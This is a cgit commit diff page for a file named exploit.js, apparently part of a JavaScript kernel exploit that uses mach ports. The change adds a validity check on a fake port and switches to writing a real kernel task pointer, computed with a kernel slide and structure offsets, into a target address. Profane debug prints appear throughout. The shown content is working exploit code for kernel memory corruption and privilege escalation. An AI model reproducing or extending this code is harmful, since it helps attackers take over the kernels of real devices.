summaryrefslogtreecommitdiff
path: root/src/js/kexp
diff options
context:
space:
mode:
Diffstat (limited to 'src/js/kexp')
-rwxr-xr-xsrc/js/kexp/exploit.js10
1 files changed, 7 insertions, 3 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index e854ba0..fbca86c 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -496,7 +496,11 @@ again: while (true) {
*/
// var fake_port = mach_ports_lookup_shit();
printf("fuck\n");
- printf("%x\n", fake_port);
+ if (fake_port === 0 || fake_port === 0xffffffff) {
+ printf("fuck. fake port is fucked.\n");
+ continue again;
+ }
+ scall("printf", "%x\n", fake_port);
printf("fuck\n");
// todo: add mach_port_valid stuff
printf("fuck\n");
@@ -504,8 +508,8 @@ again: while (true) {
printf("fuck\n");
write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
printf("fuck\n");
-// write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
- write_u32(ptr, 0x73707621);
+ write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
+// write_u32(ptr, 0x73707621 - BSDINFO_PID_OFFSET);
printf("fuck\n");
var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
printf("fuck\n");
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 21:28:32 +0000